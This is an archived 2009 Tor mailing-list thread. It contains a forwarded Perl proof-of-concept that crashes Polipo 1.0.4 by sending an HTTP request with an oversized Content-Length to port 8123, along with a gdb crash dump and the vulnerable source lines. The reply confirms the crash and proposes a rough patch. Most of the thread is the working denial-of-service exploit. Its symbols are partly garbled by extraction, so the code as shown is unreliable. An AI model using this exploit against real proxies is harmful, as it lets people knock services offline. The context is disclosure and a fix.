Re: polipo POC

2009-12-09 Thread Jacob Appelbaum 
Darren Thurston wrote:
 
 #!/usr/bin/perl
 # estranged.pl
 # AKA
 # Polipo 1.0.4 Remote Memory Corruption 0day PoC

Cute.

 $payload = GET / HTTP/1.1\r\nContent-Length: 2147483602\r\n\r\n;
 

The proof of concept works as advertised. Wheee.

Here's a simple patch (that probably breaks some requests and is
imperfect) to stop the proof of concept while we wait on upstream to
provide a real fix for it:

--- polipo-1.0.4/client.c   2008-01-08 14:56:45.0 +0200
+++ polipo-1.0.4-fixed/client.c 2009-12-09 15:30:53.0 +0200
@@ -998,7 +998,7 @@
 return 1;
 }

-if(connection-reqlen  connection-reqbegin) {
+if(connection-reqlen  connection-reqbegin  (connection-reqlen
- connection-reqbegin )  0 ) {
 memmove(connection-reqbuf, connection-reqbuf +
connection-reqbegin,
 connection-reqlen - connection-reqbegin);
 connection-reqlen -= connection-reqbegin;

Using memmove like that is extremely unsafe. :-(

Best,
Jacob



signature.asc
Description: OpenPGP digital signature

polipo POC

2009-12-08 Thread Darren Thurston 


#!/usr/bin/perl
# estranged.pl
# AKA
# Polipo 1.0.4 Remote Memory Corruption 0day PoC
#
# Jeremy Brown [0xjbrow...@gmail.com//jbrownsec.blogspot.com//krakowlabs.com] 
12.07.2009
#
# 
*
#
# Hzzp loves you Polipo!
#
# No use reporting this issue to Ubuntu Security unless you feel like waiting 
two weeks for them to sit on
# it, then UNFLAG security issue and call it a feature.
#
# I informally request that they apologize to the developers themselves x)
#
# polipo-20080907/client.c [1001-1009]:
#
# if(connection-reqlen  connection-reqbegin) {
# memmove(connection-reqbuf, connection-reqbuf + connection-reqbegin,
# connection-reqlen - connection-reqbegin);
# connection-reqlen -= connection-reqbegin;
# connection-reqbegin = 0;
# } else {
# connection-reqlen = 0;
# connection-reqbegin = 0;
# }
#
# 0.9.8 / 1.0.4 tested vulnerable
#
# Program received signal SIGSEGV, Segmentation fault.
# 0x40093486 in memmove () from /lib/libc.so.6
# (gdb) i r
# eax0x8000 -2147483648
# ecx0x22
# edx0x802c -2147483604
# ebx0x80775d8  134706648
# esp0xb7f0 0xb7f0
# ebp0xb7f8 0xb7f8
# esi0x4017002d 1075249197
# edi0xc017002d -1072234451
# eip0x40093486 0x40093486
# eflags 0x1068667206
# cs 0x23   35
# ss 0x2b   43
# ds 0x2b   43
# es 0x2b   43
# fs 0x00
# gs 0x00
# (gdb) bt
#0  0x40093486 in memmove () from /lib/libc.so.6
#1  0x0805a594 in ?? ()
#2  0x4017 in ?? ()
#3  0xc017 in ?? ()
#4  0x802e in ?? ()
#5  0x0804e744 in ?? ()
#6  0x08077548 in ?? ()
#7  0x08077550 in ?? ()
#8  0x0001 in ?? ()
#9  0x000a in ?? ()
#10 0x0001 in ?? ()
#11 0x080775d8 in ?? ()
#12 0xb908 in ?? ()
#13 0x0805a458 in ?? ()
#14 0x08077498 in ?? ()
#15 0x0001 in ?? ()
#16 0x0001 in ?? ()
#17 0x0001 in ?? ()
#18 0x0001 in ?? ()
#19 0x0805eb8d in ?? ()
#20 0x in ?? ()
#21 0xb8d0 in ?? ()
#22 0xb8ac in ?? ()
#23 0xb8b0 in ?? ()
#24 0x in ?? ()
#25 0x in ?? ()
#26 0x in ?? ()
#27 0x in ?? ()
#28 0x in ?? ()
#29 0x in ?? ()
#30 0x in ?? ()
#31 0x in ?? ()
#32 0xb8b4 in ?? ()
#33 0xb8c0 in ?? ()
#34 0x in ?? ()
#35 0x in ?? ()
#36 0xb8b8 in ?? ()
#37 0xb8bc in ?? ()
#38 0x40170003 in ?? ()
#39 0x0806f803 in _IO_stdin_used ()
#40 0x08077550 in ?? ()
#41 0x4008dc91 in mallopt () from /lib/libc.so.6
# Previous frame inner to this frame (corrupt stack?)
# (gdb)
#
#(gdb) x/i $eip
#0x40093486 memmove+102:  repz movsb %ds:(%esi),%es:(%edi)
#
# And my hair cannot commit, to one popular genre of music
#
# 
*
# estranged.pl

use IO::Socket;

$target = $ARGV[0];
$port   = 8123;

$payload = GET / HTTP/1.1\r\nContent-Length: 2147483602\r\n\r\n;

$sock = IO::Socket::INET-new(Proto='tcp', PeerHost=$target, PeerPort=$port) 
or die Error: $target:$port\n;
$sock-send($payload);

close($sock);

***
To unsubscribe, send an e-mail to majord...@torproject.org with
unsubscribe or-talkin the body. http://archives.seul.org/or/talk/